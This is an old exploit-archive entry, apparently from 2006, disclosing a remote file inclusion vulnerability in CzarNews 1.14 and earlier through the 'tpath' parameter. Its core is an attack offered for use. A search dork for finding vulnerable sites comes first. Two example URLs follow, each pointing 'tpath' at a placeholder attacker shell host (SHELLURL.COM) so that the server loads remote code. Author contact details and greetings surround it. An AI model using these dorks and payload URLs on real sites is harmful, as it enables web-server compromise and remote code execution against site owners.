CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability
# Published : 2006-07-13
# Author : SHiKaA
# Previous Title : phpBB 3 (memberlist.php) Remote SQL Injection Exploit
# Next Title : EJ3 TOPo 2.2 (descripcion) Remote Command Execution Exploit

=================================================================
CzarNews <= (tpath) Remote File Inclusion Exploit
================================================================
                                                                |
Critical Level : Dangerous                                       |
                                                                |
=================================================================
Dork :  "CzarNews v1.12 " | "CzarNews v1.13" | "CzarNews v1.14 "

http://sitename.com/news.php?tpath=http://SHELLURL.COM?
http://sitename.com/cn_config.php?tpath=http://SHELLURL.COM?

===============================================================================
Discoverd By : SHiKaA

Conatact : SHiKaA-[at]hotmail.com

GreetZ : Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================


# www.Syue.com [2006-07-13]